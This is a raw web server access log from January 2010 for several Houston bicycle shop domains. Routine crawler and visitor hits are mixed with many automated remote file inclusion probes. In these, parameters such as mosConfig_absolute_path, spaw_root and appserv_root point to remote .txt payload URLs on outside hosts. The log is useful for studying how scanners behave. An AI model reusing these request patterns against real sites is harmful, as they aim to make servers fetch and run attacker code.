81.12.13.152 - - [11/Jan/2010:12:21:21 -0800] "GET /logs//export.php?mosConfig_absolute_path=http://dsteel.co.kr/bbs/pirates/zfxid.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
77.88.25.28 - - [11/Jan/2010:12:22:47 -0800] "GET /robots.txt HTTP/1.1" 404 - "-" "Yandex/1.01.001 (compatible; Win16; I)" "bicyclestoreshouston.com"
125.160.17.200 - - [11/Jan/2010:12:27:01 -0800] "GET /logs/access.log%20%20/errors.php?error=http://www.mygospel.net/biblelog/mybible/data/bible/newkor/id1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
125.160.17.200 - - [11/Jan/2010:12:27:01 -0800] "GET /errors.php?error=http://www.mygospel.net/biblelog/mybible/data/bible/newkor/id1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
125.160.17.200 - - [11/Jan/2010:12:27:01 -0800] "GET /logs/errors.php?error=http://www.mygospel.net/biblelog/mybible/data/bible/newkor/id1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
125.160.17.200 - - [11/Jan/2010:12:27:01 -0800] "GET /errors.php?error=http://www.mygospel.net/biblelog/mybible/data/bible/newkor/id1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
125.160.17.200 - - [11/Jan/2010:12:27:02 -0800] "GET /logs/access.log%20%20/errors.php?error=http://www.mygospel.net/biblelog/mybible/data/bible/newkor/id1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
125.160.17.200 - - [11/Jan/2010:12:27:02 -0800] "GET /logs/errors.php?error=http://www.mygospel.net/biblelog/mybible/data/bible/newkor/id1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
125.160.17.200 - - [11/Jan/2010:12:27:04 -0800] "GET /logs/errors.php?error=http://www.mygospel.net/biblelog/mybible/data/bible/newkor/id1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
125.160.17.200 - - [11/Jan/2010:12:27:04 -0800] "GET /logs/access.log%20%20/errors.php?error=http://www.mygospel.net/biblelog/mybible/data/bible/newkor/id1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
125.160.17.200 - - [11/Jan/2010:12:27:04 -0800] "GET /errors.php?error=http://www.mygospel.net/biblelog/mybible/data/bible/newkor/id1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
125.160.17.200 - - [11/Jan/2010:12:27:05 -0800] "GET /errors.php?error=http://www.mygospel.net/biblelog/mybible/data/bible/newkor/id1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
125.160.17.200 - - [11/Jan/2010:12:27:05 -0800] "GET /logs/access.log%20%20/errors.php?error=http://www.mygospel.net/biblelog/mybible/data/bible/newkor/id1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
125.160.17.200 - - [11/Jan/2010:12:27:05 -0800] "GET /logs/errors.php?error=http://www.mygospel.net/biblelog/mybible/data/bible/newkor/id1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
81.12.13.152 - - [11/Jan/2010:12:29:07 -0800] "GET /logs/access.log//export.php?mosConfig_absolute_path=http://dsteel.co.kr/bbs/pirates/zfxid.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
81.12.13.152 - - [11/Jan/2010:12:29:07 -0800] "GET /export.php?mosConfig_absolute_path=http://dsteel.co.kr/bbs/pirates/zfxid.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
81.12.13.152 - - [11/Jan/2010:12:29:07 -0800] "GET /logs//export.php?mosConfig_absolute_path=http://dsteel.co.kr/bbs/pirates/zfxid.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
124.0.94.62 - - [11/Jan/2010:12:36:41 -0800] "GET /translations/Italian.txt%20%20////?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
124.0.94.62 - - [11/Jan/2010:12:36:41 -0800] "GET /translations////?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 200 3862 "-" "Mozilla/5.0" "houstonbikeshop.com"
124.0.94.62 - - [11/Jan/2010:12:36:41 -0800] "GET ///?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 200 1765 "-" "Mozilla/5.0" "houstonbikeshop.com"
124.0.94.62 - - [11/Jan/2010:12:37:17 -0800] "GET ///?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 200 1765 "-" "Mozilla/5.0" "houstonbikeshop.com"
124.0.94.62 - - [11/Jan/2010:12:37:18 -0800] "GET /translations/Italian.txt%20%20////?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
124.0.94.62 - - [11/Jan/2010:12:37:18 -0800] "GET /translations////?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 200 3862 "-" "Mozilla/5.0" "houstonbikeshop.com"
200.93.147.154 - - [11/Jan/2010:12:40:35 -0800] "GET /logs//admin/spaw/spaw_control.class.php?spaw_root=http://www.johngarzon.com.co//list/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
200.93.147.154 - - [11/Jan/2010:12:40:42 -0800] "GET /logs/access.log%20%20//admin/spaw/spaw_control.class.php?spaw_root=http://www.johngarzon.com.co//list/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
201.93.165.28 - - [11/Jan/2010:12:41:14 -0800] "GET /admin/spaw/spaw_control.class.php?spaw_root=http://www.johngarzon.com.co//list/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
201.93.165.28 - - [11/Jan/2010:12:41:14 -0800] "GET /logs/access.log%20%20//admin/spaw/spaw_control.class.php?spaw_root=http://www.johngarzon.com.co//list/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
201.93.165.28 - - [11/Jan/2010:12:41:14 -0800] "GET /logs//admin/spaw/spaw_control.class.php?spaw_root=http://www.johngarzon.com.co//list/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
67.192.48.157 - - [11/Jan/2010:12:45:14 -0800] "GET /logs/access.log/skin/zero_vote/error.php?dir=http://bdautosales.com/images/builders/build.url??? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "houstonbikeshop.com"
67.192.48.157 - - [11/Jan/2010:12:45:14 -0800] "GET /skin/zero_vote/error.php?dir=http://bdautosales.com/images/builders/build.url??? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "houstonbikeshop.com"
67.192.48.157 - - [11/Jan/2010:12:45:15 -0800] "GET /logs/skin/zero_vote/error.php?dir=http://bdautosales.com/images/builders/build.url??? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "houstonbikeshop.com"
201.93.165.28 - - [11/Jan/2010:12:46:43 -0800] "GET /logs//admin/spaw/spaw_control.class.php?spaw_root=http://www.johngarzon.com.co//list/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
201.93.165.28 - - [11/Jan/2010:12:46:43 -0800] "GET /admin/spaw/spaw_control.class.php?spaw_root=http://www.johngarzon.com.co//list/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
201.93.165.28 - - [11/Jan/2010:12:46:43 -0800] "GET /logs/access.log%20%20//admin/spaw/spaw_control.class.php?spaw_root=http://www.johngarzon.com.co//list/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
89.149.244.92 - - [11/Jan/2010:12:49:34 -0800] "GET /bullitinboard/index.php HTTP/1.0" 200 517 "http://houstonbikeshop.com/bullitinboard/index.php" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98; Win 9x 4.90)" "houstonbikeshop.com"
77.88.25.28 - - [11/Jan/2010:12:50:12 -0800] "GET /robots.txt HTTP/1.1" 404 - "-" "Yandex/1.01.001 (compatible; Win16; I)" "houstonbikeshop.com"
124.0.94.62 - - [11/Jan/2010:12:53:20 -0800] "GET /components/com_hashcash/server.php?mosConfig_absolute_path=http://www.hyonsvc.co.kr//bbs//upload/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
124.0.94.62 - - [11/Jan/2010:12:53:20 -0800] "GET /logs//components/com_hashcash/server.php?mosConfig_absolute_path=http://www.hyonsvc.co.kr//bbs//upload/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
124.0.94.62 - - [11/Jan/2010:12:53:20 -0800] "GET /logs/access.log%20%20//components/com_hashcash/server.php?mosConfig_absolute_path=http://www.hyonsvc.co.kr//bbs//upload/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
201.93.165.28 - - [11/Jan/2010:12:53:31 -0800] "GET /logs/access.log//admin/spaw/spaw_control.class.php?spaw_root=http://www.johngarzon.com.co//list/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
89.149.244.92 - - [11/Jan/2010:12:55:59 -0800] "GET /bullitinboard/index.php HTTP/1.0" 200 517 "http://bicyclestoreshouston.com/bullitinboard/index.php" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98; Win 9x 4.90)" "bicyclestoreshouston.com"
221.143.40.35 - - [11/Jan/2010:12:56:19 -0800] "GET /logs//bbs/skin/zero_vote/ask_password.php?dir=http://www.hyonsvc.co.kr//bbs//upload/id1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
221.143.40.35 - - [11/Jan/2010:12:56:19 -0800] "GET /logs/access.log//bbs/skin/zero_vote/ask_password.php?dir=http://www.hyonsvc.co.kr//bbs//upload/id1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
221.143.40.35 - - [11/Jan/2010:12:56:19 -0800] "GET /bbs/skin/zero_vote/ask_password.php?dir=http://www.hyonsvc.co.kr//bbs//upload/id1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
203.253.25.15 - - [11/Jan/2010:12:58:19 -0800] "GET ///?mosConfig_absolute_path=http://www.hyonsvc.co.kr//bbs//upload/id1.txt??? HTTP/1.1" 200 1765 "-" "Mozilla/5.0" "houstonbikeshop.com"
203.253.25.15 - - [11/Jan/2010:12:58:19 -0800] "GET /translations////?mosConfig_absolute_path=http://www.hyonsvc.co.kr//bbs//upload/id1.txt??? HTTP/1.1" 200 3862 "-" "Mozilla/5.0" "houstonbikeshop.com"
203.253.25.15 - - [11/Jan/2010:12:58:39 -0800] "GET /translations/Czech.txt%20%20////?mosConfig_absolute_path=http://www.hyonsvc.co.kr//bbs//upload/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
125.160.17.200 - - [11/Jan/2010:12:59:53 -0800] "GET /logs//assets/snippets/reflect/snippet.reflect.php?reflect_base=http://www.mygospel.net/biblelog/mybible/data/bible/newkor/id1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
125.160.17.200 - - [11/Jan/2010:12:59:53 -0800] "GET /assets/snippets/reflect/snippet.reflect.php?reflect_base=http://www.mygospel.net/biblelog/mybible/data/bible/newkor/id1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
125.160.17.200 - - [11/Jan/2010:12:59:53 -0800] "GET /logs/access.log%20%20//assets/snippets/reflect/snippet.reflect.php?reflect_base=http://www.mygospel.net/biblelog/mybible/data/bible/newkor/id1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
125.160.17.200 - - [11/Jan/2010:13:00:07 -0800] "GET /assets/snippets/reflect/snippet.reflect.php?reflect_base=http://www.mygospel.net/biblelog/mybible/data/bible/newkor/id1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
125.160.17.200 - - [11/Jan/2010:13:00:07 -0800] "GET /logs//assets/snippets/reflect/snippet.reflect.php?reflect_base=http://www.mygospel.net/biblelog/mybible/data/bible/newkor/id1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
125.160.17.200 - - [11/Jan/2010:13:00:07 -0800] "GET /logs/access.log%20%20//assets/snippets/reflect/snippet.reflect.php?reflect_base=http://www.mygospel.net/biblelog/mybible/data/bible/newkor/id1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
75.126.17.250 - - [11/Jan/2010:13:02:50 -0800] "GET /administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
75.126.17.250 - - [11/Jan/2010:13:02:50 -0800] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
75.126.17.250 - - [11/Jan/2010:13:02:50 -0800] "GET /logs/access.log%20%20//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
75.126.17.250 - - [11/Jan/2010:13:08:23 -0800] "GET /logs/access.log//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
200.93.147.154 - - [11/Jan/2010:13:09:27 -0800] "GET /logs/access.log//admin/spaw/spaw_control.class.php?spaw_root=http://www.johngarzon.com.co//list/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
75.126.17.250 - - [11/Jan/2010:13:11:02 -0800] "GET /logs/access.log%20%20//skin/zero_vote/error.php?dir=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
75.126.17.250 - - [11/Jan/2010:13:11:02 -0800] "GET /skin/zero_vote/error.php?dir=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
75.126.17.250 - - [11/Jan/2010:13:11:02 -0800] "GET /logs//skin/zero_vote/error.php?dir=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
124.115.6.10 - - [11/Jan/2010:13:11:28 -0800] "GET /robots.txt HTTP/1.1" 404 - "-" "Sosospider+(+http://help.soso.com/webspider.htm)" "bicyclestoreshouston.com"
114.80.93.71 - - [11/Jan/2010:13:19:45 -0800] "GET / HTTP/1.1" 200 1764 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)" "bicyclestoreshouston.com"
75.126.17.250 - - [11/Jan/2010:13:25:26 -0800] "GET /logs/access.log//skin/zero_vote/error.php?dir=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
67.195.37.114 - - [11/Jan/2010:13:29:04 -0800] "GET /robots.txt HTTP/1.0" 404 - "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "houstonbikeshop.com"
67.195.37.114 - - [11/Jan/2010:13:29:06 -0800] "GET /bullitinboard/viewtopic.php?p=4270 HTTP/1.0" 200 517 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "houstonbikeshop.com"
124.115.6.15 - - [11/Jan/2010:13:34:39 -0800] "GET /robots.txt HTTP/1.1" 404 - "-" "Sosospider+(+http://help.soso.com/webspider.htm)" "www.svbikes.com"
124.115.1.60 - - [11/Jan/2010:13:34:57 -0800] "GET / HTTP/1.1" 200 1764 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)" "www.bicyclestoreshouston.com"
195.149.115.164 - - [11/Jan/2010:13:41:15 -0800] "GET /logs//appserv/main.php?appserv_root=http://zuo.w8w.pl/r0x.txt???? HTTP/1.1" 404 - "-" "libwww-perl/5.834" "houstonbikeshop.com"
195.149.115.164 - - [11/Jan/2010:13:41:15 -0800] "GET /logs/access.log//appserv/main.php?appserv_root=http://zuo.w8w.pl/r0x.txt???? HTTP/1.1" 404 - "-" "libwww-perl/5.834" "houstonbikeshop.com"
195.149.115.164 - - [11/Jan/2010:13:41:15 -0800] "GET /appserv/main.php?appserv_root=http://zuo.w8w.pl/r0x.txt???? HTTP/1.0" 404 - "-" "libwww-perl/5.834" "houstonbikeshop.com"
124.115.10.193 - - [11/Jan/2010:13:46:52 -0800] "GET / HTTP/1.1" 200 1764 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)" "www.bicyclestoreshouston.com"
124.115.1.66 - - [11/Jan/2010:13:52:58 -0800] "GET / HTTP/1.1" 200 1764 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)" "www.bicyclestoreshouston.com"
196.40.10.250 - - [11/Jan/2010:13:58:50 -0800] "GET /bullitinboard/index.php HTTP/1.0" 200 517 "http://houstonbikeshop.com/bullitinboard/index.php" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)" "houstonbikeshop.com"
196.40.10.250 - - [11/Jan/2010:13:58:50 -0800] "GET / HTTP/1.0" 200 1748 "http://houstonbikeshop.com/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)" "houstonbikeshop.com"
196.40.10.250 - - [11/Jan/2010:13:58:51 -0800] "GET /bullitinboard/ HTTP/1.0" 200 517 "http://houstonbikeshop.com/bullitinboard/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)" "houstonbikeshop.com"
58.61.164.40 - - [11/Jan/2010:14:12:53 -0800] "GET / HTTP/1.1" 200 1764 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)" "bicyclestoreshouston.com"
70.102.63.195 - - [11/Jan/2010:14:15:22 -0800] "GET / HTTP/1.1" 200 1764 "-" "Mozilla/5.0 (X11; U; Linux i686 (x86_64); en-US; rv:1.8.0.1) Gecko/20060124 Firefox/1.5.0.1" "bicyclestoreshouston.com"
58.61.164.141 - - [11/Jan/2010:14:15:50 -0800] "GET / HTTP/1.1" 200 1764 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)" "bicyclestoreshouston.com"
58.61.164.140 - - [11/Jan/2010:14:19:05 -0800] "GET /bullitinboard/viewtopic.php?p=15524 HTTP/1.1" 200 533 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)" "bicyclestoreshouston.com"
124.115.1.59 - - [11/Jan/2010:14:19:34 -0800] "GET / HTTP/1.1" 200 1764 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)" "www.bicyclestoreshouston.com"
79.170.45.126 - - [11/Jan/2010:14:34:35 -0800] "GET /logs/access.log%20%20//bbs//skin/ggambo7002_board/write.php?dir=http://www.chicagofc.co.kr/fitness/data/come11/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
79.170.45.126 - - [11/Jan/2010:14:34:35 -0800] "GET /bbs//skin/ggambo7002_board/write.php?dir=http://www.chicagofc.co.kr/fitness/data/come11/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
79.170.45.126 - - [11/Jan/2010:14:34:35 -0800] "GET /logs//bbs//skin/ggambo7002_board/write.php?dir=http://www.chicagofc.co.kr/fitness/data/come11/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
79.170.45.126 - - [11/Jan/2010:14:34:49 -0800] "GET /bbs//skin/ggambo7002_board/write.php?dir=http://www.chicagofc.co.kr/fitness/data/come11/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
79.170.45.126 - - [11/Jan/2010:14:34:49 -0800] "GET /logs//bbs//skin/ggambo7002_board/write.php?dir=http://www.chicagofc.co.kr/fitness/data/come11/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
79.170.45.126 - - [11/Jan/2010:14:34:49 -0800] "GET /logs/access.log%20%20//bbs//skin/ggambo7002_board/write.php?dir=http://www.chicagofc.co.kr/fitness/data/come11/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
208.80.193.28 - - [11/Jan/2010:15:00:23 -0800] "GET / HTTP/1.0" 200 1748 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; FunWebProducts; .NET CLR 1.1.4322; Creative ZENcast v1.00.19)" "houstonbikeshop.com"
58.61.164.39 - - [11/Jan/2010:15:08:23 -0800] "GET / HTTP/1.1" 200 1764 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)" "bicyclestoreshouston.com"
124.115.1.62 - - [11/Jan/2010:15:09:12 -0800] "GET / HTTP/1.1" 200 1764 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)" "www.bicyclestoreshouston.com"
124.115.1.7 - - [11/Jan/2010:15:14:44 -0800] "GET / HTTP/1.1" 200 1764 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)" "bicyclestoreshouston.com"
193.47.80.45 - - [11/Jan/2010:15:27:23 -0800] "GET / HTTP/1.1" 200 1764 "-" "Mozilla/5.0 (compatible; Exabot/3.0; +http://www.exabot.com/go/robot)" "www.svbikes.com"
121.78.118.94 - - [11/Jan/2010:15:30:27 -0800] "GET /logs/access.log//?_zb_path=http://art.srru.ac.th/images/blank.gif?? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "houstonbikeshop.com"
121.78.118.94 - - [11/Jan/2010:15:30:28 -0800] "GET /?_zb_path=http://art.srru.ac.th/images/blank.gif?? HTTP/1.1" 200 1764 "-" "libwww-perl/5.805" "houstonbikeshop.com"
121.78.118.94 - - [11/Jan/2010:15:30:29 -0800] "GET /logs//?_zb_path=http://art.srru.ac.th/images/blank.gif?? HTTP/1.1" 200 2373 "-" "libwww-perl/5.805" "houstonbikeshop.com"
210.116.103.118 - - [11/Jan/2010:15:30:52 -0800] "GET /logs/access.log//?_zb_path=http://art.srru.ac.th/images/blank.gif?? HTTP/1.1" 404 - "-" "libwww-perl/5.79" "houstonbikeshop.com"
210.116.103.118 - - [11/Jan/2010:15:30:53 -0800] "GET /?_zb_path=http://art.srru.ac.th/images/blank.gif?? HTTP/1.1" 200 1764 "-" "libwww-perl/5.79" "houstonbikeshop.com"
210.116.103.118 - - [11/Jan/2010:15:30:53 -0800] "GET /logs//?_zb_path=http://art.srru.ac.th/images/blank.gif?? HTTP/1.1" 200 2373 "-" "libwww-perl/5.79" "houstonbikeshop.com"
211.172.243.91 - - [11/Jan/2010:15:32:02 -0800] "GET /logs/access.log//?_zb_path=http://art.srru.ac.th/images/blank.gif?? HTTP/1.1" 404 - "-" "libwww-perl/5.65" "houstonbikeshop.com"
211.172.243.91 - - [11/Jan/2010:15:32:03 -0800] "GET /?_zb_path=http://art.srru.ac.th/images/blank.gif?? HTTP/1.1" 200 1764 "-" "libwww-perl/5.65" "houstonbikeshop.com"
211.172.243.91 - - [11/Jan/2010:15:32:04 -0800] "GET /logs//?_zb_path=http://art.srru.ac.th/images/blank.gif?? HTTP/1.1" 200 2373 "-" "libwww-perl/5.65" "houstonbikeshop.com"
58.61.164.139 - - [11/Jan/2010:15:36:03 -0800] "GET / HTTP/1.1" 200 1764 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)" "bicyclestoreshouston.com"
124.115.1.61 - - [11/Jan/2010:15:44:49 -0800] "GET / HTTP/1.1" 200 1764 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)" "www.bicyclestoreshouston.com"
78.36.180.132 - - [11/Jan/2010:16:01:10 -0800] "GET /bullitinboard/index.php HTTP/1.0" 200 517 "http://www.svbikes.com/bullitinboard/index.php" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.3) Gecko/20041002 Firefox/0.10.1" "www.svbikes.com"
78.36.180.132 - - [11/Jan/2010:16:01:21 -0800] "GET / HTTP/1.0" 200 1748 "http://www.svbikes.com/" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.3) Gecko/20041002 Firefox/0.10.1" "www.svbikes.com"
78.36.180.132 - - [11/Jan/2010:16:01:31 -0800] "GET /bullitinboard/ HTTP/1.0" 200 517 "http://www.svbikes.com/bullitinboard/" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.3) Gecko/20041002 Firefox/0.10.1" "www.svbikes.com"
210.116.103.118 - - [11/Jan/2010:16:03:11 -0800] "GET /logs/access.log//bbs/skin/ggambo7002_board/write.php?dir=http://art.srru.ac.th/images/blank.gif?? HTTP/1.1" 404 - "-" "libwww-perl/5.79" "houstonbikeshop.com"
210.116.103.118 - - [11/Jan/2010:16:03:12 -0800] "GET /bbs/skin/ggambo7002_board/write.php?dir=http://art.srru.ac.th/images/blank.gif?? HTTP/1.1" 404 - "-" "libwww-perl/5.79" "houstonbikeshop.com"
210.116.103.118 - - [11/Jan/2010:16:03:12 -0800] "GET /logs//bbs/skin/ggambo7002_board/write.php?dir=http://art.srru.ac.th/images/blank.gif?? HTTP/1.1" 404 - "-" "libwww-perl/5.79" "houstonbikeshop.com"
67.195.37.114 - - [11/Jan/2010:16:07:28 -0800] "GET /bullitinboard/viewtopic.php?p=4245 HTTP/1.0" 200 517 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "houstonbikeshop.com"
79.170.45.126 - - [11/Jan/2010:16:10:10 -0800] "GET /appserv/main.php?appserv_root=http://www.chicagofc.co.kr/fitness/data/come11/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
79.170.45.126 - - [11/Jan/2010:16:10:10 -0800] "GET /logs//appserv/main.php?appserv_root=http://www.chicagofc.co.kr/fitness/data/come11/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
79.170.45.126 - - [11/Jan/2010:16:10:10 -0800] "GET /logs/access.log%20%20//appserv/main.php?appserv_root=http://www.chicagofc.co.kr/fitness/data/come11/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
79.170.45.126 - - [11/Jan/2010:16:12:19 -0800] "GET /appserv/main.php?appserv_root=http://www.chicagofc.co.kr/fitness/data/come11/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
79.170.45.126 - - [11/Jan/2010:16:12:19 -0800] "GET /logs//appserv/main.php?appserv_root=http://www.chicagofc.co.kr/fitness/data/come11/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
79.170.45.126 - - [11/Jan/2010:16:12:19 -0800] "GET /logs/access.log%20%20//appserv/main.php?appserv_root=http://www.chicagofc.co.kr/fitness/data/come11/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
79.170.45.126 - - [11/Jan/2010:16:13:47 -0800] "GET /appserv/main.php?appserv_root=http://www.chicagofc.co.kr/fitness/data/come11/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
79.170.45.126 - - [11/Jan/2010:16:13:47 -0800] "GET /logs/access.log%20%20//appserv/main.php?appserv_root=http://www.chicagofc.co.kr/fitness/data/come11/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
79.170.45.126 - - [11/Jan/2010:16:13:47 -0800] "GET /logs//appserv/main.php?appserv_root=http://www.chicagofc.co.kr/fitness/data/come11/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
79.170.45.126 - - [11/Jan/2010:16:15:37 -0800] "GET /appserv/main.php?appserv_root=http://www.chicagofc.co.kr/fitness/data/come11/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
79.170.45.126 - - [11/Jan/2010:16:15:37 -0800] "GET /logs/access.log%20%20//appserv/main.php?appserv_root=http://www.chicagofc.co.kr/fitness/data/come11/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
79.170.45.126 - - [11/Jan/2010:16:15:37 -0800] "GET /logs//appserv/main.php?appserv_root=http://www.chicagofc.co.kr/fitness/data/come11/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
79.170.45.126 - - [11/Jan/2010:16:18:32 -0800] "GET /appserv/main.php?appserv_root=http://www.chicagofc.co.kr/fitness/data/come11/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
